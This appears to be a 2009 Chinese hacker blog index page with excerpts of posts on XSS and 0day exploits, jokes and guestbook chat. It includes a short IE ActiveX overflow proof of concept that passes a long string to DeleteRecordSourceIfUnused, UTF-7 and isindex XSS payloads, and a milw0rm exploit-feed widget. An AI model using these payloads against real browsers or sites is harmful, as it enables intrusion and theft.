ShadowHider's Blog
百度空间 | 百度首页 
               
 
文章列表
 
2009-07-02 14:10

Web、HTML、CSS、各家瀏覽器,都在持續演進著,以資安的觀點來看,演進的過程中包含了許多為了修補當初不安全設計而做得努力。IE,現在已經到IE 8了。

本文續「誰在看我的噗?第一回:DOM沙盒 vs 跨網站腳本漏洞(XSS)」。

許 多朋友透過email/msn/plurk問我,這個攻擊為何說IE<=7才能觸發?其實這個問題不是三言兩語解釋得清楚,所以我只在文中寫IE& lt;=7,不想讓已經很長的一篇變得更長,但沒想

 
2009-06-28 23:22
sH:阿碼科技blogspot上写的,鉴于国内的和谐性,于是乎转载来方便大众。

上星期天下午,下大雨,沒法出去,隨手開了Plurk,想到了Plurk之前公開的「XSS挑戰」,只要找到漏洞,證明並回報的噗友,就有Plurk hacker勳章可以拿,之前我

 
2009-06-21 13:19
关于前面那篇纯属骗流量的:当时在一老外blog上闲逛,发现了那个东东,虽然是老东西了,但是是个写的很标准的POC,而且里面变量的名字和我喜欢用的ID:sH竟然一样,忽忽,就记录在这备用了。
PS:标题也是直接粘过来的,估计大家都是被(0day)给拉过来的。
----------------------------------------------------------------------------------------------------------------------------------------
话说昨天去爱博
 
2009-06-17 16:34
<html>
<object id=ctl
classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var sH = 'AAAA';
while (sH.length <= 256) sH+=sH;
ctl.DeleteRecordSourceIfUnused(sH);
</script>
</html>
 
2009-06-14 13:05

基本样式

+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
<script>alert(document.location)</script>
UTF-7 XSS的最基本的样式。

URL encoded 转换后的样式

 
2009-06-13 20:30
1   收银员说:没零钱了,找你两个塑料袋吧。
2、别跟我谈感情,多伤钱哪!
3、我诅咒你一辈子买方便面没有调料包!
4、世界上有两种人,一种是懂二进制的,一种不懂。
5、虽然你身上喷了古龙水, 但我还是能隐约闻到一股人渣味儿 。
6、我这辈子只有两件事不会,就是这也不会那也不会。
7、我想我是太久没吃鸡肉了...不然为什么昨天看见鸡毛掸子---居然有点激动?
8、抽,是一种生活艺术;找抽,是一种生活态度。
9、我的人生有A面也有B面你的人生有S面也有B
 
2009-06-06 17:21
<!-- latest 10 remote exploits - START -->
<script type="text/javascript">

var feed_Module1              = 'http://milw0rm.com/js/3.0/remote.php'              
var table_border_Module1      = '0'               // table borde
 
2009-05-20 20:21
貌似没什么人提过的标签:
<isindex action=javascript:alert(1) type=image>
在XSS的世界里尽情的游吧~
 
2009-05-09 20:12
Ratproxy评估、web跨站脚本漏洞风险的标准:

ECHO :Query parameters echoed back / not echoed in HTTP response, respectively

输出:请求的参数或查询的内容是否在HTTP响应里返回输出过。

PRED:Request URL or

 
2009-05-05 19:24
盼星星盼月亮的终于盼来了,哇卡卡~~
这回在学校有事干了。
刚粗略的看了下,茄子,刺牛和luoluo巨牛的那几篇超赞啊,细细研读中.....

余弦,哪天去虐你们乒乓~~~
 
     
 
 
个人档案
 
zrxc
男, 17岁
北京 宣武区 
上次登录:
2天前
加为好友
 
   
 
文章分类
 
 
 
0day(28)
 
 
 
 
闲扯(22)
 
 
Xss(7)
 
     
 
最新评论
 
文章评论|照片评论


话说楼上的还是邪八的版主...
 

回复hysia:我到处偷版主做......
 

我也发现sH居然搞了个暗组的版主。。。
 
 

省的翻墙了... thk u~
 
你家狗狗的狗牙不好看!
 
     
 
留言板
 

图片
 

回复xsser:先加我QQ吧,慢慢给你讲。 去dream那要我QQ。
 

回复zrxc:你还是没明白,你看看百度搜索里的源代码,那“<”“>”没被转换?那是不可...
 

回复xsser:最最最简单的例子:baidu搜索可以输入"<" ">",你能XSS? 多去看些XSS方面...
 

回复zrxc:为什么我觉得能输入"<" ">"的地方都能XSS。 或者你举点例子出来吧,虚心请...
 
     
 
最新照片
 
   
 
最近访客
 
 

文雨o7

wo_伱徳主角

如果_插请深插

hysia

叶子雨2008

zooboa

linx2008

asi97
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu